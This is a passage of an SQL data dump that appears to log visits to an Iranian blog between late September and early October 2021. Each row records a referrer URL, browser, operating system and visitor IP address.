(13931,'2021-09-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,6,0),
(13932,'2021-09-28','http://design-arena.ir/blog/','Chrome','OS X','10.15.7',NULL,NULL,'','188.165.213.192','000',0,3,0),
(13933,'2021-09-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(13934,'2021-09-28','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.243','000',0,1,0),
(13935,'2021-09-28','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.247','000',0,1,0),
(13936,'2021-09-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,2,0),
(13937,'2021-09-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.204.234','000',0,1,0),
(13938,'2021-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.225.70.251','000',0,3,0),
(13939,'2021-09-28','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.163','000',0,1,0),
(13940,'2021-09-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.72','000',0,2,0),
(13941,'2021-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.235.211','000',0,2,0),
(13942,'2021-09-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.219.179','000',0,1,0),
(13943,'2021-09-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','74.205.233.165','000',0,6,0),
(13944,'2021-09-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.214.235.55','000',0,1,0),
(13945,'2021-09-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.46.148.122','000',0,3,0),
(13946,'2021-09-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.160.88.19','000',0,1,0),
(13947,'2021-09-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','169.57.230.233','000',0,1,0),
(13948,'2021-09-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','168.1.216.8','000',0,1,0),
(13949,'2021-09-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','85.203.15.5','000',0,2,0),
(13950,'2021-09-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,2,0),
(13951,'2021-09-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.61.186.108','000',0,1,0),
(13952,'2021-09-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.220.101.10','000',0,1,0),
(13953,'2021-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.151.39','000',0,1,0),
(13954,'2021-09-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.9.73.95','000',0,2,0),
(13955,'2021-09-28','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.15','000',0,2,0),
(13956,'2021-09-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','213.33.190.51','000',0,1,0),
(13957,'2021-09-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,2,0),
(13958,'2021-09-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(13959,'2021-09-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(13960,'2021-09-28','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','81.233.143.38','000',0,3,0),
(13961,'2021-09-28','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','114.143.206.99','000',0,3,0),
(13962,'2021-09-28','http://ictbank.ir/','2345 Explorer','Windows','6.1',NULL,NULL,'','46.161.63.35','000',0,5,0),
(13963,'2021-09-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.144.176.138','000',0,2,0),
(13964,'2021-09-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.189.13.185','000',0,2,0),
(13965,'2021-09-29','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','192.228.145.158','000',0,1,0),
(13966,'2021-09-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(13967,'2021-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.151.109','000',0,2,0),
(13968,'2021-09-29','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','79.174.160.203','000',0,1,0),
(13969,'2021-09-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13970,'2021-09-29','http://ictbank.ir/blog','Safari','OS X','10.13.6',NULL,NULL,'','94.130.67.224','000',0,3,0),
(13971,'2021-09-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.179','000',0,2,0),
(13972,'2021-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.141.107','000',0,1,0),
(13973,'2021-09-29','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.122','000',0,1,0),
(13974,'2021-09-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13975,'2021-09-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(13976,'2021-09-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(13977,'2021-09-29','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,2,0),
(13978,'2021-09-29','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.88.24','000',0,3,0),
(13979,'2021-09-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13980,'2021-09-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,2,0),
(13981,'2021-09-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(13982,'2021-09-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.208.50','000',0,1,0),
(13983,'2021-09-29','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','54.147.127.250','000',0,1,0),
(13984,'2021-09-29','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','108.62.116.172','000',0,5,0),
(13985,'2021-09-29','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.108','000',0,2,0),
(13986,'2021-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.219','000',0,2,0),
(13987,'2021-09-30','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.108','000',0,1,0),
(13988,'2021-09-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(13989,'2021-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','182.50.132.70','000',0,1,0),
(13990,'2021-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','147.182.137.190','000',0,2,0),
(13991,'2021-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','142.93.12.229','000',0,1,0),
(13992,'2021-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.104.68.94','000',0,2,0),
(13993,'2021-09-30','http://design-arena.ir','Unknown','Windows','10.0',NULL,NULL,'','81.19.214.5','000',0,1,0),
(13994,'2021-09-30','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','188.251.171.64','000',0,1,0),
(13995,'2021-09-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13996,'2021-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.37.137','000',0,2,0),
(13997,'2021-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.179','000',0,2,0),
(13998,'2021-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','157.230.86.188','000',0,2,0),
(13999,'2021-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.57.60','000',0,1,0),
(14000,'2021-09-30','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(14001,'2021-09-30','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.139.86.167','000',0,4,0),
(14002,'2021-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','157.230.13.23','000',0,1,0),
(14003,'2021-09-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','109.74.204.252','000',0,2,0),
(14004,'2021-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.70.84.213','000',0,2,0),
(14005,'2021-09-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.222.72','000',0,1,0),
(14006,'2021-09-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','157.245.79.36','000',0,1,0),
(14007,'2021-09-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14008,'2021-09-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14009,'2021-09-30','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,2,0),
(14010,'2021-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.209.253.92','000',0,2,0),
(14011,'2021-09-30','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(14012,'2021-10-01','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.233.226.113','000',0,2,0),
(14013,'2021-10-01','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','205.185.123.97','000',0,1,0),
(14014,'2021-10-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','195.78.54.61','000',0,2,0),
(14015,'2021-10-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14016,'2021-10-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(14017,'2021-10-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.9.73.95','000',0,2,0),
(14018,'2021-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.41.225','000',0,2,0),
(14019,'2021-10-01','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','143.244.41.211','000',0,2,0),
(14020,'2021-10-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,3,0),
(14021,'2021-10-01','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.5','000',0,1,0),
(14022,'2021-10-01','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.125','000',0,1,0),
(14023,'2021-10-01','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.84','000',0,2,0),
(14024,'2021-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.165.217','000',0,1,0),
(14025,'2021-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.39.218','000',0,1,0),
(14026,'2021-10-01','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','195.181.49.86','000',0,1,0),
(14027,'2021-10-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14028,'2021-10-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(14029,'2021-10-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14030,'2021-10-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,1,0),
(14031,'2021-10-01','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','84.113.221.157','000',0,1,0),
(14032,'2021-10-01','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','183.110.224.126','000',0,2,0),
(14033,'2021-10-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.2.52','000',0,1,0),
(14034,'2021-10-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14035,'2021-10-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(14036,'2021-10-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14037,'2021-10-02','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.93','000',0,1,0),
(14038,'2021-10-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(14039,'2021-10-02','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(14040,'2021-10-02','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','45.144.225.59','000',0,1,0),
(14041,'2021-10-02','http://m.ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,2,0),
(14042,'2021-10-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(14043,'2021-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.44.212','000',0,2,0),
(14044,'2021-10-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(14045,'2021-10-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14046,'2021-10-02','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.99','000',0,1,0),
(14047,'2021-10-02','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.106','000',0,1,0),
(14048,'2021-10-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(14049,'2021-10-02','http://ictbank.ir/blog','Chrome','OS X','10.6.8',NULL,NULL,'','213.239.193.124','000',0,2,0),
(14050,'2021-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.60.42','000',0,1,0),
(14051,'2021-10-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.20','000',0,2,0),
(14052,'2021-10-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(14053,'2021-10-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.182','000',0,1,0),
(14054,'2021-10-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,2,0),
(14055,'2021-10-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(14056,'2021-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.66.88.100','000',0,2,0),
(14057,'2021-10-03','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.12','000',0,2,0),
(14058,'2021-10-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,11,0),
(14059,'2021-10-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(14060,'2021-10-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.35','000',0,3,0),
(14061,'2021-10-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.72','000',0,2,0),
(14062,'2021-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.160.111','000',0,2,0),
(14063,'2021-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.165.174.224','000',0,20,0),
(14064,'2021-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.113.215','000',0,1,0),
(14065,'2021-10-03','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','198.23.242.154','000',0,5,0),
(14066,'2021-10-03','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(14067,'2021-10-03','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14068,'2021-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.238.190','000',0,1,0),
(14069,'2021-10-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14070,'2021-10-03','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','185.253.97.251','000',0,1,0),
(14071,'2021-10-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.86.228.46','000',0,2,0),
(14072,'2021-10-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.182','000',0,1,0),
(14073,'2021-10-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(14074,'2021-10-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14075,'2021-10-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14076,'2021-10-03','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.161','000',0,1,0),
(14077,'2021-10-04','http://design-arena.ir/blog','Chrome','Android','10.0',NULL,NULL,'','124.126.78.169','000',0,2,0),
(14078,'2021-10-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(14079,'2021-10-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.14','000',0,2,0),
(14080,'2021-10-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14081,'2021-10-04','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.177.130','000',0,3,0),
(14082,'2021-10-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14083,'2021-10-04','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,3,0),
(14084,'2021-10-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.93.239','000',0,2,0),
(14085,'2021-10-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','89.208.29.23','000',0,1,0),
(14086,'2021-10-04','http://ictbank.ir/blog','Chrome','Android','9.0',NULL,NULL,'','61.135.15.145','000',0,1,0),
(14087,'2021-10-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.179','000',0,2,0),
(14088,'2021-10-04','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','171.16.208.4','000',0,1,0),
(14089,'2021-10-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.119.12','000',0,1,0),
(14090,'2021-10-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(14091,'2021-10-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(14092,'2021-10-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14093,'2021-10-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14094,'2021-10-04','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','200.187.164.193','000',0,1,0),
(14095,'2021-10-04','http://design-arena.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','103.253.25.169','000',0,2,0),
(14096,'2021-10-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','66.69.88.73','000',0,1,0),
(14097,'2021-10-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.22','000',0,2,0),
(14098,'2021-10-04','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','52.31.230.232','000',0,1,0),
(14099,'2021-10-05','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.72.230.73','000',0,1,0),
(14100,'2021-10-05','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.72','000',0,4,0),
(14101,'2021-10-05','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.16','000',0,2,0),
(14102,'2021-10-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','37.120.144.67','000',0,5,0),
(14103,'2021-10-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14104,'2021-10-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.163.237.210','000',0,1,0),
(14105,'2021-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14106,'2021-10-05','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,2,0),
(14107,'2021-10-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.163','000',0,2,0),
(14108,'2021-10-05','https://www.qwant.com/','Chrome','Windows','10.0',NULL,NULL,'','165.225.94.110','000',0,1,0),
(14109,'2021-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.215.22','000',0,2,0),
(14110,'2021-10-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.149.218','000',0,1,0),
(14111,'2021-10-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(14112,'2021-10-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14113,'2021-10-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.182','000',0,1,0),
(14114,'2021-10-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14115,'2021-10-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14116,'2021-10-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.19.40','000',0,5,0),
(14117,'2021-10-05','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,2,0),
(14118,'2021-10-05','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','170.81.218.160','000',0,1,0),
(14119,'2021-10-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','3.83.24.167','000',0,1,0),
(14120,'2021-10-06','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(14121,'2021-10-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14122,'2021-10-06','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14123,'2021-10-06','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,1,0),
(14124,'2021-10-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.72','000',0,2,0),
(14125,'2021-10-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,24,0),
(14126,'2021-10-06','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.67','000',0,1,0),
(14127,'2021-10-06','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.66','000',0,1,0),
(14128,'2021-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.220.252','000',0,2,0),
(14129,'2021-10-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','37.204.238.189','000',0,2,0),
(14130,'2021-10-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.9.73.95','000',0,2,0),
(14131,'2021-10-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14132,'2021-10-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.172.56.241','000',0,2,0),
(14133,'2021-10-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.244.200.179','000',0,13,0),
(14134,'2021-10-06','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.95.116.127','000',0,2,0),
(14135,'2021-10-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14136,'2021-10-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(14137,'2021-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.35.251','000',0,1,0),
(14138,'2021-10-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(14139,'2021-10-06','http://ictbank.ir/','Safari','Windows','5.0',NULL,NULL,'','45.141.87.42','000',0,1,0),
(14140,'2021-10-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.90.148.46','000',0,2,0),
(14141,'2021-10-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','52.246.254.9','000',0,2,0),
(14142,'2021-10-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,2,0),
(14143,'2021-10-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14144,'2021-10-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14145,'2021-10-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,2,0),
(14146,'2021-10-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.165.81.190','000',0,1,0),
(14147,'2021-10-06','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','86.55.41.180','000',0,2,0),
(14148,'2021-10-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','160.116.94.20','000',0,21,0),
(14149,'2021-10-06','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.129.252','000',0,2,0),
(14150,'2021-10-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','160.116.191.72','000',0,21,0),
(14151,'2021-10-06','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.125.20','000',0,2,0),
(14152,'2021-10-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14153,'2021-10-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','50.3.83.52','000',0,12,0),
(14154,'2021-10-06','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','50.3.89.217','000',0,2,0),
(14155,'2021-10-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.175.67.198','000',0,2,0),
(14156,'2021-10-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.242.114.12','000',0,12,0),
(14157,'2021-10-07','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.172.71.121','000',0,2,0),
